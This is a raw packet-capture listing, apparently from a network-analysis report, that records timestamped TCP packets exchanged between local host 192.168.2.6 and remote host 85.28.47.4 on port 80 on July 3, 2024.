                                                                Jul 3, 2024 08:38:11.343643904 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.343725920 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.343779087 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.343817949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.343828917 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.343877077 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.343899012 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.343941927 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.343962908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.344005108 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.344578028 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.344621897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.344626904 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.344633102 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.344660997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.344677925 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.344733953 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.344744921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.344784021 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.345408916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.345431089 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.345441103 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.345463037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.345485926 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.345519066 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.345560074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.421247005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.421263933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.421274900 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.421302080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.421313047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.421323061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.421477079 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.421475887 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.421475887 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.421488047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.421515942 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.421542883 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.425654888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.425683975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.425694942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.425744057 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.425770044 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.425832987 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.425843954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.425853968 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.425870895 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.425888062 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.426111937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.426124096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.426161051 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.426258087 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.426299095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.426387072 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.426398039 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.426434994 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.426455975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.426466942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.426477909 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.426496983 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.426520109 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.430284977 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.430310011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.430320024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.430347919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.430370092 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.430387974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.430424929 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.430444956 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.430455923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.430481911 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.430496931 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.430581093 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.430592060 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.430602074 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.430624962 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.430648088 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.431375980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.431413889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.431423903 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.431423903 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.431447983 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.431463957 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.431529999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.431544065 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.431555986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.431572914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.431590080 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.432249069 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.432296991 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.432298899 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.432311058 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.432332993 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.432349920 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.432405949 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.432416916 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.432426929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.432449102 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.432471037 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.433260918 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.433300018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.433310986 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.433316946 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.433334112 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.433347940 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.433433056 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.433444023 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.433454037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.433474064 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.433499098 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.434166908 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.434178114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.434217930 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.505043983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.505078077 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.505089998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.505192041 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.505300045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.505300045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.505300045 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.508033037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.508045912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.508055925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.508106947 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.508136988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.508147955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.508153915 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.508160114 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.508183002 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.508208990 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.508322954 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.508333921 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.508344889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.508354902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.508382082 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.508407116 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.512702942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.512732983 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.512744904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.512768030 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.512804985 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.512851000 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.512861013 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.512872934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.512892008 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.512922049 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.512984037 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.512994051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513005018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513032913 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.513057947 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.513098001 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513108969 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513120890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513140917 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.513165951 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.513492107 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513539076 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.513581038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513592005 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513623953 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.513669014 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.513695955 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513706923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513717890 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513729095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513739109 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.513765097 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.513840914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.513880014 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.517069101 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.517082930 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.517093897 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.517131090 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.517143011 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.517143965 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.517184019 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.517237902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.517275095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.517282963 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.517288923 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.517302036 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.517318964 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.517345905 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.517347097 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.517421007 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.517466068 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.517956018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518004894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.518068075 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518105984 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518116951 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.518119097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518146992 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.518172979 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.518210888 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518223047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518270969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.518270969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.518559933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518580914 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518591881 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518620968 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.518620968 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.518656969 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.518714905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518727064 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518738031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518749952 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518768072 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.518791914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.518893003 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.518942118 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.519486904 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.519534111 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.519532919 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.519545078 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.519578934 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.519603968 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.519664049 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.519675016 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.519686937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.519697905 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.519706011 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.519732952 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.519778967 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.519810915 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.519856930 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.520390034 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.520421982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.520431995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.520549059 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.520550013 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.520560980 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.520571947 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.520584106 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.520613909 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.520637989 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.520721912 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.520770073 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.521198988 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.521243095 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.521246910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.521255970 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.521290064 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.521332026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.521369934 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.521383047 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.521393061 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.521404982 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.521418095 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.521444082 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.521469116 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.521572113 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.521583080 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.521625042 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.522123098 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.522171974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.522182941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.522186041 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.522231102 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.522231102 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.522311926 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.522322893 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.522332907 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.522344112 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.522358894 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.522384882 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.522403002 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.522485018 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.522530079 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.591789961 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.591825008 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.591835022 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.591878891 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.591886997 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.591890097 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.591900110 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.591912031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.592048883 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.592048883 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.592082024 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.592118025 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.592123032 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.592158079 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.594799995 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.594826937 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.594839096 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.594856977 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.594880104 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.594923973 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.594959974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.594963074 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.594996929 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.595077038 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595087051 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595098019 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595124006 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.595145941 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.595187902 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595225096 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.595274925 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595313072 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.595370054 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595381975 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595392942 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595410109 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.595429897 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.595556021 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595568895 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595606089 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.595622063 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.595669031 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595679998 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595709085 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.595722914 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.595768929 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.595808029 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.599320889 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599345922 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599355936 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599371910 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.599396944 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.599404097 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.599421978 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599457026 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.599488974 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599499941 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599524975 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.599538088 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.599637032 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599647999 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599658966 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599669933 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599679947 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.599704027 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.599775076 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599813938 CEST4971080192.168.2.685.28.47.4
                                                                Jul 3, 2024 08:38:11.599889994 CEST804971085.28.47.4192.168.2.6
                                                                Jul 3, 2024 08:38:11.599903107 CEST804971085.28.47.4192.168.2.6
